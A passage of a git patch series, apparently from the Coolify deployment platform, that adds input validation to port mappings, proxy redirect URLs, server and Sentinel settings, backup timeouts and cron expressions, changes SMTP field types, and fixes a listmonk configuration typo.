             'publicPortTimeout' => 'nullable|integer|min:1',
@@ -107,6 +107,7 @@ protected function messages(): array
     {
         return array_merge(
             ValidationPatterns::combinedMessages(),
+            ValidationPatterns::portMappingMessages(),
             [
                 'name.required' => 'The Name field is required.',
                 'postgresUser.required' => 'The Postgres User field is required.',
@@ -456,6 +457,9 @@ public function submit()
         try {
             $this->authorize('update', $this->database);
 
+            if ($this->portsMappings) {
+                $this->portsMappings = str($this->portsMappings)->replace(' ', '')->trim()->toString();
+            }
             if (str($this->publicPort)->isEmpty()) {
                 $this->publicPort = null;
             }
diff --git a/app/Livewire/Project/Database/Redis/General.php b/app/Livewire/Project/Database/Redis/General.php
index ebe2f3ba0..a1a22ab8b 100644
--- a/app/Livewire/Project/Database/Redis/General.php
+++ b/app/Livewire/Project/Database/Redis/General.php
@@ -73,7 +73,7 @@ protected function rules(): array
             'description' => ValidationPatterns::descriptionRules(),
             'redisConf' => 'nullable',
             'image' => 'required',
-            'portsMappings' => 'nullable',
+            'portsMappings' => ValidationPatterns::portMappingRules(),
             'isPublic' => 'nullable|boolean',
             'publicPort' => 'nullable|integer',
             'publicPortTimeout' => 'nullable|integer|min:1',
@@ -89,6 +89,7 @@ protected function messages(): array
     {
         return array_merge(
             ValidationPatterns::combinedMessages(),
+            ValidationPatterns::portMappingMessages(),
             [
                 'name.required' => 'The Name field is required.',
                 'image.required' => 'The Docker Image field is required.',
@@ -201,6 +202,9 @@ public function submit()
         try {
             $this->authorize('manageEnvironment', $this->database);
 
+            if ($this->portsMappings) {
+                $this->portsMappings = str($this->portsMappings)->replace(' ', '')->trim()->toString();
+            }
             $this->syncData(true);
 
             if (version_compare($this->redisVersion, '6.0', '>=')) {
diff --git a/app/Support/ValidationPatterns.php b/app/Support/ValidationPatterns.php
index 7084b4cc2..5d53076ea 100644
--- a/app/Support/ValidationPatterns.php
+++ b/app/Support/ValidationPatterns.php
@@ -194,6 +194,12 @@ public static function volumeNameMessages(string $field = 'name'): array
         ];
     }
 
+    /**
+     * Pattern for port mappings (e.g. 3000:3000, 8080:80, 8000-8010:8000-8010)
+     * Each entry requires host:container format, where each side can be a number or a range (number-number)
+     */
+    public const PORT_MAPPINGS_PATTERN = '/^(\d+(-\d+)?:\d+(-\d+)?)(,\d+(-\d+)?:\d+(-\d+)?)*$/';
+
     /**
      * Get validation rules for container name fields
      */
@@ -202,6 +208,24 @@ public static function containerNameRules(int $maxLength = 255): array
         return ['string', 'max:'.$maxLength, 'regex:'.self::CONTAINER_NAME_PATTERN];
     }
 
+    /**
+     * Get validation rules for port mapping fields
+     */
+    public static function portMappingRules(): array
+    {
+        return ['nullable', 'string', 'regex:'.self::PORT_MAPPINGS_PATTERN];
+    }
+
+    /**
+     * Get validation messages for port mapping fields
+     */
+    public static function portMappingMessages(string $field = 'portsMappings'): array
+    {
+        return [
+            "{$field}.regex" => 'Port mappings must be a comma-separated list of port pairs or ranges (e.g. 3000:3000,8080:80,8000-8010:8000-8010).',
+        ];
+    }
+
     /**
      * Check if a string is a valid Docker container name.
      */

From 73258c317e3d79aefb90924d5319ddc54209eebc Mon Sep 17 00:00:00 2001
From: ShadowArcanist <162910371+ShadowArcanist@users.noreply.github.com>
Date: Sun, 29 Mar 2026 00:34:32 +0530
Subject: [PATCH 175/213] fix(validation): add URL validation for proxy
 redirect input

---
 app/Livewire/Server/Proxy.php | 12 +++++++++---
 1 file changed, 9 insertions(+), 3 deletions(-)

diff --git a/app/Livewire/Server/Proxy.php b/app/Livewire/Server/Proxy.php
index d5f30fca0..c2d8205ef 100644
--- a/app/Livewire/Server/Proxy.php
+++ b/app/Livewire/Server/Proxy.php
@@ -6,6 +6,7 @@
 use App\Actions\Proxy\SaveProxyConfiguration;
 use App\Enums\ProxyTypes;
 use App\Models\Server;
+use App\Rules\SafeExternalUrl;
 use Illuminate\Foundation\Auth\Access\AuthorizesRequests;
 use Livewire\Component;
 
@@ -41,9 +42,13 @@ public function getListeners()
         ];
     }
 
-    protected $rules = [
-        'generateExactLabels' => 'required|boolean',
-    ];
+    protected function rules()
+    {
+        return [
+            'generateExactLabels' => 'required|boolean',
+            'redirectUrl' => ['nullable', new SafeExternalUrl],
+        ];
+    }
 
     public function mount()
     {
@@ -147,6 +152,7 @@ public function submit()
     {
         try {
             $this->authorize('update', $this->server);
+            $this->validate();
             SaveProxyConfiguration::run($this->server, $this->proxySettings);
             $this->server->proxy->redirect_url = $this->redirectUrl;
             $this->server->save();

From c52a199120d2d06e2a473305734643f2bd66ead1 Mon Sep 17 00:00:00 2001
From: ShadowArcanist <162910371+ShadowArcanist@users.noreply.github.com>
Date: Sun, 29 Mar 2026 01:14:08 +0530
Subject: [PATCH 176/213] fix(validation): add input validation for server
 advanced settings page

---
 app/Http/Controllers/Api/ServersController.php | 18 +++++++++++++++++-
 app/Livewire/Server/Advanced.php               | 16 ++++++++--------
 .../views/livewire/server/advanced.blade.php   |  4 ++++
 3 files changed, 29 insertions(+), 9 deletions(-)

diff --git a/app/Http/Controllers/Api/ServersController.php b/app/Http/Controllers/Api/ServersController.php
index 2ef95ce8b..930879d80 100644
--- a/app/Http/Controllers/Api/ServersController.php
+++ b/app/Http/Controllers/Api/ServersController.php
@@ -598,6 +598,11 @@ public function create_server(Request $request)
                         'is_build_server' => ['type' => 'boolean', 'description' => 'Is build server.'],
                         'instant_validate' => ['type' => 'boolean', 'description' => 'Instant validate.'],
                         'proxy_type' => ['type' => 'string', 'enum' => ['traefik', 'caddy', 'none'], 'description' => 'The proxy type.'],
+                        'concurrent_builds' => ['type' => 'integer', 'description' => 'Number of concurrent builds.'],
+                        'dynamic_timeout' => ['type' => 'integer', 'description' => 'Deployment timeout in seconds.'],
+                        'deployment_queue_limit' => ['type' => 'integer', 'description' => 'Maximum number of queued deployments.'],
+                        'server_disk_usage_notification_threshold' => ['type' => 'integer', 'description' => 'Server disk usage notification threshold (%).'],
+                        'server_disk_usage_check_frequency' => ['type' => 'string', 'description' => 'Cron expression for disk usage check frequency.'],
                     ],
                 ),
             ),
@@ -634,7 +639,7 @@ public function create_server(Request $request)
     )]
     public function update_server(Request $request)
     {
-        $allowedFields = ['name', 'description', 'ip', 'port', 'user', 'private_key_uuid', 'is_build_server', 'instant_validate', 'proxy_type'];
+        $allowedFields = ['name', 'description', 'ip', 'port', 'user', 'private_key_uuid', 'is_build_server', 'instant_validate', 'proxy_type', 'concurrent_builds', 'dynamic_timeout', 'deployment_queue_limit', 'server_disk_usage_notification_threshold', 'server_disk_usage_check_frequency'];
 
         $teamId = getTeamIdFromToken();
         if (is_null($teamId)) {
@@ -655,6 +660,11 @@ public function update_server(Request $request)
             'is_build_server' => 'boolean|nullable',
             'instant_validate' => 'boolean|nullable',
             'proxy_type' => 'string|nullable',
+            'concurrent_builds' => 'integer|nullable|min:1',
+            'dynamic_timeout' => 'integer|nullable|min:1',
+            'deployment_queue_limit' => 'integer|nullable|min:1',
+            'server_disk_usage_notification_threshold' => 'integer|nullable|min:1|max:100',
+            'server_disk_usage_check_frequency' => 'string|nullable',
         ]);
 
         $extraFields = array_diff(array_keys($request->all()), $allowedFields);
@@ -691,6 +701,12 @@ public function update_server(Request $request)
                 'is_build_server' => $request->is_build_server,
             ]);
         }
+
+        $advancedSettings = $request->only(['concurrent_builds', 'dynamic_timeout', 'deployment_queue_limit', 'server_disk_usage_notification_threshold', 'server_disk_usage_check_frequency']);
+        if (! empty($advancedSettings)) {
+            $server->settings()->update(array_filter($advancedSettings, fn ($value) => ! is_null($value)));
+        }
+
         if ($request->instant_validate) {
             ValidateServer::dispatch($server);
         }
diff --git a/app/Livewire/Server/Advanced.php b/app/Livewire/Server/Advanced.php
index dba1b4903..0e1a9a325 100644
--- a/app/Livewire/Server/Advanced.php
+++ b/app/Livewire/Server/Advanced.php
@@ -15,17 +15,17 @@ class Advanced extends Component
     #[Validate(['string'])]
     public string $serverDiskUsageCheckFrequency = '0 23 * * *';
 
-    #[Validate(['integer', 'min:1', 'max:99'])]
-    public int $serverDiskUsageNotificationThreshold = 50;
+    #[Validate(['required', 'integer', 'min:1', 'max:99'])]
+    public ?int $serverDiskUsageNotificationThreshold = 50;
 
-    #[Validate(['integer', 'min:1'])]
-    public int $concurrentBuilds = 1;
+    #[Validate(['required', 'integer', 'min:1'])]
+    public ?int $concurrentBuilds = 1;
 
-    #[Validate(['integer', 'min:1'])]
-    public int $dynamicTimeout = 1;
+    #[Validate(['required', 'integer', 'min:1'])]
+    public ?int $dynamicTimeout = 1;
 
-    #[Validate(['integer', 'min:1'])]
-    public int $deploymentQueueLimit = 25;
+    #[Validate(['required', 'integer', 'min:1'])]
+    public ?int $deploymentQueueLimit = 25;
 
     public function mount(string $server_uuid)
     {
diff --git a/resources/views/livewire/server/advanced.blade.php b/resources/views/livewire/server/advanced.blade.php
index 33086aea1..f6610c1d5 100644
--- a/resources/views/livewire/server/advanced.blade.php
+++ b/resources/views/livewire/server/advanced.blade.php
@@ -22,6 +22,7 @@
                             id="serverDiskUsageCheckFrequency" label="Disk usage check frequency" required
                             helper="Cron expression for disk usage check frequency.<br>You can use every_minute, hourly, daily, weekly, monthly, yearly.<br><br>Default is every night at 11:00 PM." />
                         <x-forms.input canGate="update" :canResource="$server" id="serverDiskUsageNotificationThreshold"
+                            type="number" min="1" max="99"
                             label="Server disk usage notification threshold (%)" required
                             helper="If the server disk usage exceeds this threshold, Coolify will send a notification to the team members." />
                     </div>
@@ -31,12 +32,15 @@
                     <h3>Builds</h3>
                     <div class="flex flex-wrap gap-2 sm:flex-nowrap pt-4">
                         <x-forms.input canGate="update" :canResource="$server" id="concurrentBuilds"
+                            type="number" min="1"
                             label="Number of concurrent builds" required
                             helper="You can specify the number of simultaneous build processes/deployments that should run concurrently." />
                         <x-forms.input canGate="update" :canResource="$server" id="dynamicTimeout"
+                            type="number" min="1"
                             label="Deployment timeout (seconds)" required
                             helper="You can define the maximum duration for a deployment to run before timing it out." />
                         <x-forms.input canGate="update" :canResource="$server" id="deploymentQueueLimit"
+                            type="number" min="1"
                             label="Deployment queue limit" required
                             helper="Maximum number of queued deployments allowed. New deployments will be rejected with a 429 status when the limit is reached." />
                     </div>

From 15a98b52c93746e54bd40812f0a9f8c0229a5457 Mon Sep 17 00:00:00 2001
From: ShadowArcanist <162910371+ShadowArcanist@users.noreply.github.com>
Date: Sun, 29 Mar 2026 01:24:08 +0530
Subject: [PATCH 177/213] fix(validation): add input validation for
 server_disk_usage_check_frequency on API

---
 app/Http/Controllers/Api/ServersController.php | 7 +++++++
 1 file changed, 7 insertions(+)

diff --git a/app/Http/Controllers/Api/ServersController.php b/app/Http/Controllers/Api/ServersController.php
index 930879d80..beba33a8c 100644
--- a/app/Http/Controllers/Api/ServersController.php
+++ b/app/Http/Controllers/Api/ServersController.php
@@ -702,6 +702,13 @@ public function update_server(Request $request)
             ]);
         }
 
+        if ($request->has('server_disk_usage_check_frequency') && ! validate_cron_expression($request->server_disk_usage_check_frequency)) {
+            return response()->json([
+                'message' => 'Validation failed.',
+                'errors' => ['server_disk_usage_check_frequency' => ['Invalid Cron / Human expression for Disk Usage Check Frequency.']],
+            ], 422);
+        }
+
         $advancedSettings = $request->only(['concurrent_builds', 'dynamic_timeout', 'deployment_queue_limit', 'server_disk_usage_notification_threshold', 'server_disk_usage_check_frequency']);
         if (! empty($advancedSettings)) {
             $server->settings()->update(array_filter($advancedSettings, fn ($value) => ! is_null($value)));

From 1ebba7da3acccf7e0cb1cf740ec531637895276b Mon Sep 17 00:00:00 2001
From: ShadowArcanist <162910371+ShadowArcanist@users.noreply.github.com>
Date: Sun, 29 Mar 2026 01:52:19 +0530
Subject: [PATCH 178/213] fix(validation): add input validation for sentinel
 configuration

---
 app/Livewire/Server/Sentinel.php                   | 6 +++---
 resources/views/livewire/server/sentinel.blade.php | 7 ++++---
 2 files changed, 7 insertions(+), 6 deletions(-)

diff --git a/app/Livewire/Server/Sentinel.php b/app/Livewire/Server/Sentinel.php
index dff379ae1..a4b35891b 100644
--- a/app/Livewire/Server/Sentinel.php
+++ b/app/Livewire/Server/Sentinel.php
@@ -25,13 +25,13 @@ class Sentinel extends Component
     public ?string $sentinelUpdatedAt = null;
 
     #[Validate(['required', 'integer', 'min:1'])]
-    public int $sentinelMetricsRefreshRateSeconds;
+    public int|string $sentinelMetricsRefreshRateSeconds;
 
     #[Validate(['required', 'integer', 'min:1'])]
-    public int $sentinelMetricsHistoryDays;
+    public int|string $sentinelMetricsHistoryDays;
 
     #[Validate(['required', 'integer', 'min:10'])]
-    public int $sentinelPushIntervalSeconds;
+    public int|string $sentinelPushIntervalSeconds;
 
     #[Validate(['nullable', 'url'])]
     public ?string $sentinelCustomUrl = null;
diff --git a/resources/views/livewire/server/sentinel.blade.php b/resources/views/livewire/server/sentinel.blade.php
index 4016a30e4..5ca535cbc 100644
--- a/resources/views/livewire/server/sentinel.blade.php
+++ b/resources/views/livewire/server/sentinel.blade.php
@@ -91,13 +91,14 @@
 
                         <div class="flex flex-col gap-2">
                             <div class="flex flex-wrap gap-2 sm:flex-nowrap">
-                                <x-forms.input canGate="update" :canResource="$server"
+                                <x-forms.input canGate="update" :canResource="$server" type="number" min="1"
                                     id="sentinelMetricsRefreshRateSeconds" label="Metrics rate (seconds)" required
                                     helper="Interval used for gathering metrics. Lower values result in more disk space usage." />
-                                <x-forms.input canGate="update" :canResource="$server" id="sentinelMetricsHistoryDays"
+                                <x-forms.input canGate="update" :canResource="$server" type="number" min="1"
+                                    id="sentinelMetricsHistoryDays"
                                     label="Metrics history (days)" required
                                     helper="Number of days to retain metrics data for." />
-                                <x-forms.input canGate="update" :canResource="$server"
+                                <x-forms.input canGate="update" :canResource="$server" type="number" min="10"
                                     id="sentinelPushIntervalSeconds" label="Push interval (seconds)" required
                                     helper="Interval at which metrics data is sent to the collector." />
                             </div>

From 791aa10b3fed851df81192538f2aa15144eb179b Mon Sep 17 00:00:00 2001
From: ShadowArcanist <162910371+ShadowArcanist@users.noreply.github.com>
Date: Sun, 29 Mar 2026 02:24:36 +0530
Subject: [PATCH 179/213] fix(validation): use int|string for Livewire numeric
 properties and remove nullable from API rules

---
 app/Http/Controllers/Api/ServersController.php | 10 +++++-----
 app/Livewire/Server/Advanced.php               |  8 ++++----
 2 files changed, 9 insertions(+), 9 deletions(-)

diff --git a/app/Http/Controllers/Api/ServersController.php b/app/Http/Controllers/Api/ServersController.php
index beba33a8c..c13c6665c 100644
--- a/app/Http/Controllers/Api/ServersController.php
+++ b/app/Http/Controllers/Api/ServersController.php
@@ -660,11 +660,11 @@ public function update_server(Request $request)
             'is_build_server' => 'boolean|nullable',
             'instant_validate' => 'boolean|nullable',
             'proxy_type' => 'string|nullable',
-            'concurrent_builds' => 'integer|nullable|min:1',
-            'dynamic_timeout' => 'integer|nullable|min:1',
-            'deployment_queue_limit' => 'integer|nullable|min:1',
-            'server_disk_usage_notification_threshold' => 'integer|nullable|min:1|max:100',
-            'server_disk_usage_check_frequency' => 'string|nullable',
+            'concurrent_builds' => 'integer|min:1',
+            'dynamic_timeout' => 'integer|min:1',
+            'deployment_queue_limit' => 'integer|min:1',
+            'server_disk_usage_notification_threshold' => 'integer|min:1|max:100',
+            'server_disk_usage_check_frequency' => 'string',
         ]);
 
         $extraFields = array_diff(array_keys($request->all()), $allowedFields);
diff --git a/app/Livewire/Server/Advanced.php b/app/Livewire/Server/Advanced.php
index 0e1a9a325..b39da5e5a 100644
--- a/app/Livewire/Server/Advanced.php
+++ b/app/Livewire/Server/Advanced.php
@@ -16,16 +16,16 @@ class Advanced extends Component
     public string $serverDiskUsageCheckFrequency = '0 23 * * *';
 
     #[Validate(['required', 'integer', 'min:1', 'max:99'])]
-    public ?int $serverDiskUsageNotificationThreshold = 50;
+    public int|string $serverDiskUsageNotificationThreshold = 50;
 
     #[Validate(['required', 'integer', 'min:1'])]
-    public ?int $concurrentBuilds = 1;
+    public int|string $concurrentBuilds = 1;
 
     #[Validate(['required', 'integer', 'min:1'])]
-    public ?int $dynamicTimeout = 1;
+    public int|string $dynamicTimeout = 1;
 
     #[Validate(['required', 'integer', 'min:1'])]
-    public ?int $deploymentQueueLimit = 25;
+    public int|string $deploymentQueueLimit = 25;
 
     public function mount(string $server_uuid)
     {

From 67f8eb929f5655a71263c99c2c05a27654a8868b Mon Sep 17 00:00:00 2001
From: ShadowArcanist <162910371+ShadowArcanist@users.noreply.github.com>
Date: Sun, 29 Mar 2026 02:48:32 +0530
Subject: [PATCH 180/213] fix(validation): add input validation for database
 backup timeout

---
 app/Livewire/Project/Database/BackupEdit.php   |  2 +-
 .../project/database/backup-edit.blade.php     | 18 +++++++++---------
 2 files changed, 10 insertions(+), 10 deletions(-)

diff --git a/app/Livewire/Project/Database/BackupEdit.php b/app/Livewire/Project/Database/BackupEdit.php
index 0fff2bd03..a18022882 100644
--- a/app/Livewire/Project/Database/BackupEdit.php
+++ b/app/Livewire/Project/Database/BackupEdit.php
@@ -76,7 +76,7 @@ class BackupEdit extends Component
     public bool $dumpAll = false;
 
     #[Validate(['required', 'int', 'min:60', 'max:36000'])]
-    public int $timeout = 3600;
+    public int|string $timeout = 3600;
 
     public function mount()
     {
diff --git a/resources/views/livewire/project/database/backup-edit.blade.php b/resources/views/livewire/project/database/backup-edit.blade.php
index bb5dcfc4d..d5c25916a 100644
--- a/resources/views/livewire/project/database/backup-edit.blade.php
+++ b/resources/views/livewire/project/database/backup-edit.blade.php
@@ -81,10 +81,10 @@
             @endif
         </div>
         <div class="flex gap-2">
-            <x-forms.input label="Frequency" id="frequency" />
+            <x-forms.input label="Frequency" id="frequency" required />
             <x-forms.input label="Timezone" id="timezone" disabled
-                helper="The timezone of the server where the backup is scheduled to run (if not set, the instance timezone will be used)" />
-            <x-forms.input label="Timeout" id="timeout" helper="The timeout of the backup job in seconds." />
+                helper="The timezone of the server where the backup is scheduled to run (if not set, the instance timezone will be used)" required />
+            <x-forms.input label="Timeout" id="timeout" type="number" min="60" helper="The timeout of the backup job in seconds." required />
         </div>
 
         <h3 class="mt-6 mb-2 text-lg font-medium">Backup Retention Settings</h3>
@@ -101,13 +101,13 @@
                 <div class="flex gap-2">
                     <x-forms.input label="Number of backups to keep" id="databaseBackupRetentionAmountLocally"
                         type="number" min="0"
-                        helper="Keeps only the specified number of most recent backups on the server. Set to 0 for unlimited backups." />
+                        helper="Keeps only the specified number of most recent backups on the server. Set to 0 for unlimited backups." required />
                     <x-forms.input label="Days to keep backups" id="databaseBackupRetentionDaysLocally" type="number"
                         min="0"
-                        helper="Automatically removes backups older than the specified number of days. Set to 0 for no time limit." />
+                        helper="Automatically removes backups older than the specified number of days. Set to 0 for no time limit." required />
                     <x-forms.input label="Maximum storage (GB)" id="databaseBackupRetentionMaxStorageLocally"
                         type="number" min="0"
-                        helper="When total size of all backups in the current backup job exceeds this limit in GB, the oldest backups will be removed. Decimal values are supported (e.g. 0.001 for 1MB). Set to 0 for unlimited storage." />
+                        helper="When total size of all backups in the current backup job exceeds this limit in GB, the oldest backups will be removed. Decimal values are supported (e.g. 0.001 for 1MB). Set to 0 for unlimited storage." required />
                 </div>
             </div>
 
@@ -117,13 +117,13 @@
                     <div class="flex gap-2">
                         <x-forms.input label="Number of backups to keep" id="databaseBackupRetentionAmountS3"
                             type="number" min="0"
-                            helper="Keeps only the specified number of most recent backups on S3 storage. Set to 0 for unlimited backups." />
+                            helper="Keeps only the specified number of most recent backups on S3 storage. Set to 0 for unlimited backups." required />
                         <x-forms.input label="Days to keep backups" id="databaseBackupRetentionDaysS3" type="number"
                             min="0"
-                            helper="Automatically removes S3 backups older than the specified number of days. Set to 0 for no time limit." />
+                            helper="Automatically removes S3 backups older than the specified number of days. Set to 0 for no time limit." required />
                         <x-forms.input label="Maximum storage (GB)" id="databaseBackupRetentionMaxStorageS3"
                             type="number" min="0"
-                            helper="When total size of all backups in the current backup job exceeds this limit in GB, the oldest backups will be removed. Decimal values are supported (e.g. 0.5 for 500MB). Set to 0 for unlimited storage." />
+                            helper="When total size of all backups in the current backup job exceeds this limit in GB, the oldest backups will be removed. Decimal values are supported (e.g. 0.5 for 500MB). Set to 0 for unlimited storage." required />
                     </div>
                 </div>
             @endif

From 40420e33e3aa138981cbd22982dfcc7eef2d9644 Mon Sep 17 00:00:00 2001
From: ShadowArcanist <162910371+ShadowArcanist@users.noreply.github.com>
Date: Sun, 29 Mar 2026 02:53:18 +0530
Subject: [PATCH 181/213] fix(validation): add timeout validation to database
 backup API endpoints

---
 app/Http/Controllers/Api/DatabasesController.php | 8 ++++++--
 1 file changed, 6 insertions(+), 2 deletions(-)

diff --git a/app/Http/Controllers/Api/DatabasesController.php b/app/Http/Controllers/Api/DatabasesController.php
index 660ed4529..a73bde1ae 100644
--- a/app/Http/Controllers/Api/DatabasesController.php
+++ b/app/Http/Controllers/Api/DatabasesController.php
@@ -641,6 +641,7 @@ public function update_by_uuid(Request $request)
                         'database_backup_retention_amount_s3' => ['type' => 'integer', 'description' => 'Number of backups to retain in S3'],
                         'database_backup_retention_days_s3' => ['type' => 'integer', 'description' => 'Number of days to retain backups in S3'],
                         'database_backup_retention_max_storage_s3' => ['type' => 'integer', 'description' => 'Max storage (MB) for S3 backups'],
+                        'timeout' => ['type' => 'integer', 'description' => 'Backup job timeout in seconds (min: 60, max: 36000)', 'default' => 3600],
                     ],
                 ),
             )
@@ -677,7 +678,7 @@ public function update_by_uuid(Request $request)
     )]
     public function create_backup(Request $request)
     {
-        $backupConfigFields = ['save_s3', 'enabled', 'dump_all', 'frequency', 'databases_to_backup', 'database_backup_retention_amount_locally', 'database_backup_retention_days_locally', 'database_backup_retention_max_storage_locally', 'database_backup_retention_amount_s3', 'database_backup_retention_days_s3', 'database_backup_retention_max_storage_s3', 's3_storage_uuid'];
+        $backupConfigFields = ['save_s3', 'enabled', 'dump_all', 'frequency', 'databases_to_backup', 'database_backup_retention_amount_locally', 'database_backup_retention_days_locally', 'database_backup_retention_max_storage_locally', 'database_backup_retention_amount_s3', 'database_backup_retention_days_s3', 'database_backup_retention_max_storage_s3', 's3_storage_uuid', 'timeout'];
 
         $teamId = getTeamIdFromToken();
         if (is_null($teamId)) {
@@ -704,6 +705,7 @@ public function create_backup(Request $request)
             'database_backup_retention_amount_s3' => 'integer|min:0',
             'database_backup_retention_days_s3' => 'integer|min:0',
             'database_backup_retention_max_storage_s3' => 'integer|min:0',
+            'timeout' => 'integer|min:60|max:36000',
         ]);
 
         if ($validator->fails()) {
@@ -878,6 +880,7 @@ public function create_backup(Request $request)
                         'database_backup_retention_amount_s3' => ['type' => 'integer', 'description' => 'Retention amount of the backup in s3'],
                         'database_backup_retention_days_s3' => ['type' => 'integer', 'description' => 'Retention days of the backup in s3'],
                         'database_backup_retention_max_storage_s3' => ['type' => 'integer', 'description' => 'Max storage of the backup in S3'],
+                        'timeout' => ['type' => 'integer', 'description' => 'Backup job timeout in seconds (min: 60, max: 36000)', 'default' => 3600],
                     ],
                 ),
             )
@@ -907,7 +910,7 @@ public function create_backup(Request $request)
     )]
     public function update_backup(Request $request)
     {
-        $backupConfigFields = ['save_s3', 'enabled', 'dump_all', 'frequency', 'databases_to_backup', 'database_backup_retention_amount_locally', 'database_backup_retention_days_locally', 'database_backup_retention_max_storage_locally', 'database_backup_retention_amount_s3', 'database_backup_retention_days_s3', 'database_backup_retention_max_storage_s3', 's3_storage_uuid'];
+        $backupConfigFields = ['save_s3', 'enabled', 'dump_all', 'frequency', 'databases_to_backup', 'database_backup_retention_amount_locally', 'database_backup_retention_days_locally', 'database_backup_retention_max_storage_locally', 'database_backup_retention_amount_s3', 'database_backup_retention_days_s3', 'database_backup_retention_max_storage_s3', 's3_storage_uuid', 'timeout'];
 
         $teamId = getTeamIdFromToken();
         if (is_null($teamId)) {
@@ -932,6 +935,7 @@ public function update_backup(Request $request)
             'database_backup_retention_amount_s3' => 'integer|min:0',
             'database_backup_retention_days_s3' => 'integer|min:0',
             'database_backup_retention_max_storage_s3' => 'integer|min:0',
+            'timeout' => 'integer|min:60|max:36000',
         ]);
         if ($validator->fails()) {
             return response()->json([

From b98346f3c3ffbc14868bf4b0e7b5f1c73da81dd4 Mon Sep 17 00:00:00 2001
From: ShadowArcanist <162910371+ShadowArcanist@users.noreply.github.com>
Date: Sun, 29 Mar 2026 03:02:15 +0530
Subject: [PATCH 182/213] fix(validation): validate cron expressions in update
 backup API endpoint

---
 app/Http/Controllers/Api/DatabasesController.php | 13 ++++++++++++-
 1 file changed, 12 insertions(+), 1 deletion(-)

diff --git a/app/Http/Controllers/Api/DatabasesController.php b/app/Http/Controllers/Api/DatabasesController.php
index a73bde1ae..856649b91 100644
--- a/app/Http/Controllers/Api/DatabasesController.php
+++ b/app/Http/Controllers/Api/DatabasesController.php
@@ -928,7 +928,7 @@ public function update_backup(Request $request)
             'dump_all' => 'boolean',
             's3_storage_uuid' => 'string|exists:s3_storages,uuid|nullable',
             'databases_to_backup' => 'string|nullable',
-            'frequency' => 'string|in:every_minute,hourly,daily,weekly,monthly,yearly',
+            'frequency' => 'string',
             'database_backup_retention_amount_locally' => 'integer|min:0',
             'database_backup_retention_days_locally' => 'integer|min:0',
             'database_backup_retention_max_storage_locally' => 'integer|min:0',
@@ -962,6 +962,17 @@ public function update_backup(Request $request)
 
         $this->authorize('update', $database);
 
+        // Validate frequency is a valid cron expression
+        if ($request->filled('frequency')) {
+            $isValid = validate_cron_expression($request->frequency);
+            if (! $isValid) {
+                return response()->json([
+                    'message' => 'Validation failed.',
+                    'errors' => ['frequency' => ['Invalid cron expression or frequency format.']],
+                ], 422);
+            }
+        }
+
         if ($request->boolean('save_s3') && ! $request->filled('s3_storage_uuid')) {
             return response()->json([
                 'message' => 'Validation failed.',

From ac47040fd1bff9f52b3b55d3e4fb51eceb4d563b Mon Sep 17 00:00:00 2001
From: Maxwell <136101+mxswd@users.noreply.github.com>
Date: Sun, 29 Mar 2026 14:35:48 +1000
Subject: [PATCH 183/213] Fixed typo in listmonk db config

Correct db__name to db__database
---
 templates/compose/listmonk.yaml | 4 ++--
 1 file changed, 2 insertions(+), 2 deletions(-)

diff --git a/templates/compose/listmonk.yaml b/templates/compose/listmonk.yaml
index fa73f6ff7..a204c9f74 100644
--- a/templates/compose/listmonk.yaml
+++ b/templates/compose/listmonk.yaml
@@ -12,7 +12,7 @@ services:
       - SERVICE_URL_LISTMONK_9000
       - LISTMONK_app__address=0.0.0.0:9000
       - LISTMONK_db__host=postgres
-      - LISTMONK_db__name=listmonk
+      - LISTMONK_db__database=listmonk
       - LISTMONK_db__user=$SERVICE_USER_POSTGRES
       - LISTMONK_db__password=$SERVICE_PASSWORD_POSTGRES
       - LISTMONK_db__port=5432
@@ -37,7 +37,7 @@ services:
         condition: service_healthy
     environment:
       - LISTMONK_db__host=postgres
-      - LISTMONK_db__name=listmonk
+      - LISTMONK_db__database=listmonk
       - LISTMONK_db__user=$SERVICE_USER_POSTGRES
       - LISTMONK_db__password=$SERVICE_PASSWORD_POSTGRES
       - LISTMONK_db__port=5432

From 1daff4e23ce9205241cc65459e2191f164404ebe Mon Sep 17 00:00:00 2001
From: ShadowArcanist <162910371+ShadowArcanist@users.noreply.github.com>
Date: Sun, 29 Mar 2026 12:13:30 +0530
Subject: [PATCH 184/213] fix(validation): add input validation for emails
 configuration

---
 app/Livewire/Notifications/Email.php                   | 4 ++--
 app/Livewire/SettingsEmail.php                         | 4 ++--
 resources/views/livewire/notifications/email.blade.php | 4 ++--
 resources/views/livewire/settings-email.blade.php      | 2 +-
 4 files changed, 7 insertions(+), 7 deletions(-)

diff --git a/app/Livewire/Notifications/Email.php b/app/Livewire/Notifications/Email.php
index 847f10765..364163ff8 100644
--- a/app/Livewire/Notifications/Email.php
+++ b/app/Livewire/Notifications/Email.php
@@ -42,7 +42,7 @@ class Email extends Component
     public ?string $smtpHost = null;
 
     #[Validate(['nullable', 'numeric', 'min:1', 'max:65535'])]
-    public ?int $smtpPort = null;
+    public ?string $smtpPort = null;
 
     #[Validate(['nullable', 'string', 'in:starttls,tls,none'])]
     public ?string $smtpEncryption = null;
@@ -54,7 +54,7 @@ class Email extends Component
     public ?string $smtpPassword = null;
 
     #[Validate(['nullable', 'numeric'])]
-    public ?int $smtpTimeout = null;
+    public ?string $smtpTimeout = null;
 
     #[Validate(['boolean'])]
     public bool $resendEnabled = false;
diff --git a/app/Livewire/SettingsEmail.php b/app/Livewire/SettingsEmail.php
index ca48e9b16..8c0e24400 100644
--- a/app/Livewire/SettingsEmail.php
+++ b/app/Livewire/SettingsEmail.php
@@ -33,7 +33,7 @@ class SettingsEmail extends Component
     public ?string $smtpHost = null;
 
     #[Validate(['nullable', 'numeric', 'min:1', 'max:65535'])]
-    public ?int $smtpPort = null;
+    public ?string $smtpPort = null;
 
     #[Validate(['nullable', 'string', 'in:starttls,tls,none'])]
     public ?string $smtpEncryption = 'starttls';
@@ -45,7 +45,7 @@ class SettingsEmail extends Component
     public ?string $smtpPassword = null;
 
     #[Validate(['nullable', 'numeric'])]
-    public ?int $smtpTimeout = null;
+    public ?string $smtpTimeout = null;
 
     #[Validate(['boolean'])]
     public bool $resendEnabled = false;
diff --git a/resources/views/livewire/notifications/email.blade.php b/resources/views/livewire/notifications/email.blade.php
index 538851137..410703010 100644
--- a/resources/views/livewire/notifications/email.blade.php
+++ b/resources/views/livewire/notifications/email.blade.php
@@ -72,7 +72,7 @@ class="p-4 border dark:border-coolgray-300 border-neutral-200 rounded-lg flex fl
                     <div class="flex flex-col gap-4">
                         <div class="flex flex-col w-full gap-2 xl:flex-row">
                             <x-forms.input canGate="update" :canResource="$settings" required id="smtpHost" placeholder="smtp.mailgun.org" label="Host" />
